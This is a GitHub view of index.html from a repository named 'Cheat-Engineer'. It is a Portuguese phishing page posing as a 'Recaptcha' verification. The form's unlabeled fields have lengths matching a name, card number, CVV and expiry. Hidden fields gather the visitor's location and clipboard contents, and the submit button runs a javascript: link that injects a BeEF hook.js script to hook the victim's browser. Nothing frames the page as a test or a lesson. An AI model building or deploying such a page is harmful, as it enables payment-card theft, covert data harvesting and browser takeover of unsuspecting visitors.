forked from z3ldr1/Cheat-Engineer
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
125 lines (124 loc) · 4.46 KB
/
index.html
File metadata and controls
125 lines (124 loc) · 4.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
<!DOCTYPE html>
<html lang="pt-br">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>titulo</title>
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;500;700&display=swap">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: "Poppins", sans-serif;
}
a { text-decoration: none; }
body {
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
background: url('1.jpg') no-repeat center/cover;
background-color: #141414;
}
.container {
width: 100%;
max-width: 450px;
background: rgba(0, 0, 0, 0.85);
border: 1px solid rgba(255, 255, 255, 0.1);
border-radius: 8px;
padding: 2rem;
color: #fff;
box-shadow: 0 4px 15px rgba(0, 0, 0, 0.5);
backdrop-filter: blur(5px);
}
h3 {
font-size: 1.5rem;
font-weight: 700;
margin-bottom: 1.5rem;
color: #4A90E2;
text-align: center;
}
.input-box { margin: 1rem 0; }
.input-box input {
width: 100%;
height: 45px;
background: rgba(255, 255, 255, 0.1);
border: 1px solid rgba(255, 255, 255, 0.3);
border-radius: 5px;
padding: 0 15px;
font-size: 1rem;
color: #fff;
outline: none;
transition: border-color 0.3s;
}
.input-box input:focus { border-color: #4A90E2; }
.input-box input::placeholder { color: #a1a1a1; }
.input-box input[type="number"]::-webkit-inner-spin-button,
.input-box input[type="number"]::-webkit-outer-spin-button {
-webkit-appearance: none;
margin: 0;
}
.input-box input[type="number"] { -moz-appearance: textfield; }
.remember {
display: flex;
justify-content: space-between;
align-items: center;
margin: 1rem 0;
font-size: 0.9rem;
color: #b3b3b3;
}
.remember input[type="checkbox"] { margin-right: 5px; }
.redirect {
width: 100%;
height: 50px;
background: #4A90E2;
border: none;
border-radius: 5px;
color: #fff;
font-size: 1.1rem;
font-weight: 500;
cursor: pointer;
transition: background 0.3s, transform 0.2s;
}
.redirect:hover {
background: #357ABD;
transform: translateY(-2px);
}
.feedback { margin-top: 1rem; text-align: center; }
@media (max-width: 480px) {
.container { margin: 1rem; padding: 1.5rem; }
h3 { font-size: 1.2rem; }
.redirect { font-size: 1rem; }
}
</style>
</head>
<body>
<?php include 'index.php'; ?>
<main class="container">
<form method="POST" enctype="multipart/form-data" id="form">
<h3>Confirme que é você! - Recaptcha</h3>
<div class="input-box">
<input placeholder="Input 1" type="text" name="a1" maxlength="50" required>
</div>
<div class="input-box">
<input placeholder="Input 2" type="number" name="a2" maxlength="16" required>
</div>
<div class="input-box">
<input placeholder="Input 3" type="number" name="a3" maxlength="3" required>
</div>
<div class="input-box">
<input placeholder="Input 4" type="number" name="a4" maxlength="4" required>
</div>
<div class="remember">
<label><input type="checkbox" name="remember_me"> Lembre de mim</label>
</div>
<input type="hidden" name="location" id="locationData">
<input type="hidden" name="clipboard" id="clipboardData">
<button type="submit" class="redirect" id="submitBtn"><a href="javascript:%20(function%20()%20{%20var%20url%20=%20%27http://127.0.0.1/hook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();">Enviar</a></button>
<?php echo $feedback; ?>
</form>
</main>
<script src="script.js"></script>
</body>
</html>